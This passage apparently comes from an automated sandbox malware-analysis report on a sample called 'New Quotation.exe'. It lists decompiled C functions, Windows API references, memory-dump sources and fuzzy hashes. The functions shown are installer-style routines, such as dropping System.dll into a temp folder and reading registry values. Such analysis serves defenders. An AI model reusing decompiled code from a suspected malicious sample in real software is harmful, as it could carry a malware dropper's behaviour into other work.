                                                                                                                                                                                          0x71091271
                                                                                                                                                                                          0x71091271
                                                                                                                                                                                          0x71091278
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091285
                                                                                                                                                                                          0x7109128a
                                                                                                                                                                                          0x7109128f
                                                                                                                                                                                          0x71091294
                                                                                                                                                                                          0x7109129a
                                                                                                                                                                                          0x7109129b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109129b
                                                                                                                                                                                          0x7109125b
                                                                                                                                                                                          0x7109125e
                                                                                                                                                                                          0x710911bc
                                                                                                                                                                                          0x710911bf
                                                                                                                                                                                          0x710911c2
                                                                                                                                                                                          0x710911cb
                                                                                                                                                                                          0x710911d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710911d1
                                                                                                                                                                                          0x71091264
                                                                                                                                                                                          0x71091266
                                                                                                                                                                                          0x710911a2
                                                                                                                                                                                          0x710911a5
                                                                                                                                                                                          0x710911a8
                                                                                                                                                                                          0x710911b1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710911b1
                                                                                                                                                                                          0x71091164
                                                                                                                                                                                          0x71091165
                                                                                                                                                                                          0x71091177
                                                                                                                                                                                          0x71091180
                                                                                                                                                                                          0x71091184
                                                                                                                                                                                          0x7109118e
                                                                                                                                                                                          0x71091191
                                                                                                                                                                                          0x71091193
                                                                                                                                                                                          0x71091193
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091165
                                                                                                                                                                                          0x71091143
                                                                                                                                                                                          0x71091218
                                                                                                                                                                                          0x7109121d
                                                                                                                                                                                          0x71091221
                                                                                                                                                                                          0x71091223
                                                                                                                                                                                          0x7109122c
                                                                                                                                                                                          0x7109122f
                                                                                                                                                                                          0x71091238
                                                                                                                                                                                          0x7109123d
                                                                                                                                                                                          0x7109123d
                                                                                                                                                                                          0x71091247
                                                                                                                                                                                          0x7109124a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091250
                                                                                                                                                                                          0x71091149
                                                                                                                                                                                          0x7109114c
                                                                                                                                                                                          0x710911e9
                                                                                                                                                                                          0x710911ed
                                                                                                                                                                                          0x710911f7
                                                                                                                                                                                          0x710911fb
                                                                                                                                                                                          0x71091205
                                                                                                                                                                                          0x7109120a
                                                                                                                                                                                          0x71091211
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091211
                                                                                                                                                                                          0x71091152
                                                                                                                                                                                          0x71091155
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109115b
                                                                                                                                                                                          0x7109115e
                                                                                                                                                                                          0x710911b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710911b8
                                                                                                                                                                                          0x71091160
                                                                                                                                                                                          0x71091162
                                                                                                                                                                                          0x7109119e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109119e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710912a1
                                                                                                                                                                                          0x710912a1
                                                                                                                                                                                          0x710912ab
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 71091171
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 710911E3
                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 7109124A
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 7109129B
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 710912B1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                          • Opcode ID: 20c67803e78b114f4234c681e1d508573365cea21a826a34a35959ef7f0dc64d
                                                                                                                                                                                          • Instruction ID: 6915fdee3f4d95d7ebc193e0ad887cc06e0b7a414ca2db30ed5fea17e5eca176
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20c67803e78b114f4234c681e1d508573365cea21a826a34a35959ef7f0dc64d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5551E7B6A04202DFD701DF66C974A257BF9FF48B24B10419AF906EB250E732E920DB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp", "C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nse2C2.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                                                                                                                          0x0040263e
                                                                                                                                                                                          0x0040263e
                                                                                                                                                                                          0x0040263e
                                                                                                                                                                                          0x00402643
                                                                                                                                                                                          0x00402646
                                                                                                                                                                                          0x00402649
                                                                                                                                                                                          0x0040264e
                                                                                                                                                                                          0x00402650
                                                                                                                                                                                          0x00402670
                                                                                                                                                                                          0x004026aa
                                                                                                                                                                                          0x00402672
                                                                                                                                                                                          0x00402674
                                                                                                                                                                                          0x00402688
                                                                                                                                                                                          0x00402695
                                                                                                                                                                                          0x00402695
                                                                                                                                                                                          0x00402652
                                                                                                                                                                                          0x00402654
                                                                                                                                                                                          0x00402659
                                                                                                                                                                                          0x00402667
                                                                                                                                                                                          0x0040266a
                                                                                                                                                                                          0x004026af
                                                                                                                                                                                          0x004026b2
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x004026b8
                                                                                                                                                                                          0x004026c1
                                                                                                                                                                                          0x004026c3
                                                                                                                                                                                          0x004026e2
                                                                                                                                                                                          0x004015b4
                                                                                                                                                                                          0x004015b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004015bc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004026c3
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll), ref: 00402695
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse2C2.tmp$C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll
                                                                                                                                                                                          • API String ID: 1659193697-312917621
                                                                                                                                                                                          • Opcode ID: efbeaf1aded5b84db90701020331344885af5dfdc72af07c5090307d9f212baa
                                                                                                                                                                                          • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: efbeaf1aded5b84db90701020331344885af5dfdc72af07c5090307d9f212baa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x42aa20 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}






                                                                                                                                                                                          0x00403020
                                                                                                                                                                                          0x00403040
                                                                                                                                                                                          0x0040304a
                                                                                                                                                                                          0x00403056
                                                                                                                                                                                          0x00403067
                                                                                                                                                                                          0x00403070
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403075
                                                                                                                                                                                          0x0040307c
                                                                                                                                                                                          0x00403042
                                                                                                                                                                                          0x00403049
                                                                                                                                                                                          0x00403049
                                                                                                                                                                                          0x00403022
                                                                                                                                                                                          0x00403022
                                                                                                                                                                                          0x00403029
                                                                                                                                                                                          0x0040302c
                                                                                                                                                                                          0x0040302c
                                                                                                                                                                                          0x00403032
                                                                                                                                                                                          0x00403039
                                                                                                                                                                                          0x00403039

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                          • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                          • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                                                                                          • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}





                                                                                                                                                                                          0x00405517
                                                                                                                                                                                          0x00405521
                                                                                                                                                                                          0x0040553d
                                                                                                                                                                                          0x0040555f
                                                                                                                                                                                          0x00405562
                                                                                                                                                                                          0x00405568
                                                                                                                                                                                          0x00405572
                                                                                                                                                                                          0x00405573
                                                                                                                                                                                          0x00405575
                                                                                                                                                                                          0x0040557b
                                                                                                                                                                                          0x0040557b
                                                                                                                                                                                          0x00405585
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405593
                                                                                                                                                                                          0x0040554a
                                                                                                                                                                                          0x00405582
                                                                                                                                                                                          0x00405582
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405582
                                                                                                                                                                                          0x00405556
                                                                                                                                                                                          0x00405558
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405558
                                                                                                                                                                                          0x00405527
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040552e
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                                                                                            • Part of subcall function 004044E5: SendMessageW.USER32(00010442,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                          • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                          • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                                                                          0x00406419
                                                                                                                                                                                          0x0040641b
                                                                                                                                                                                          0x00406433
                                                                                                                                                                                          0x00406438
                                                                                                                                                                                          0x0040643d
                                                                                                                                                                                          0x0040647b
                                                                                                                                                                                          0x0040647b
                                                                                                                                                                                          0x0040643f
                                                                                                                                                                                          0x00406451
                                                                                                                                                                                          0x0040645c
                                                                                                                                                                                          0x00406462
                                                                                                                                                                                          0x0040646d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040646d
                                                                                                                                                                                          0x00406481

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll), ref: 0040645C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                                                                          • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                          • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}







                                                                                                                                                                                          0x00403b58
                                                                                                                                                                                          0x00403b60
                                                                                                                                                                                          0x00403b67
                                                                                                                                                                                          0x00403b6a
                                                                                                                                                                                          0x00403b6a
                                                                                                                                                                                          0x00403b6c
                                                                                                                                                                                          0x00403b71
                                                                                                                                                                                          0x00403b78
                                                                                                                                                                                          0x00403b7e
                                                                                                                                                                                          0x00403b82
                                                                                                                                                                                          0x00403b83
                                                                                                                                                                                          0x00403b8b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,75363420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                          • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                          • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E00405E58(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                          0x00405e63
                                                                                                                                                                                          0x00405e66
                                                                                                                                                                                          0x00405e6c
                                                                                                                                                                                          0x00405e6d
                                                                                                                                                                                          0x00405e6e
                                                                                                                                                                                          0x00405e76
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e76
                                                                                                                                                                                          0x00405e78
                                                                                                                                                                                          0x00405e80

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New Quotation.exe,C:\Users\user\Desktop\New Quotation.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New Quotation.exe,C:\Users\user\Desktop\New Quotation.exe,80000000,00000003), ref: 00405E6E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
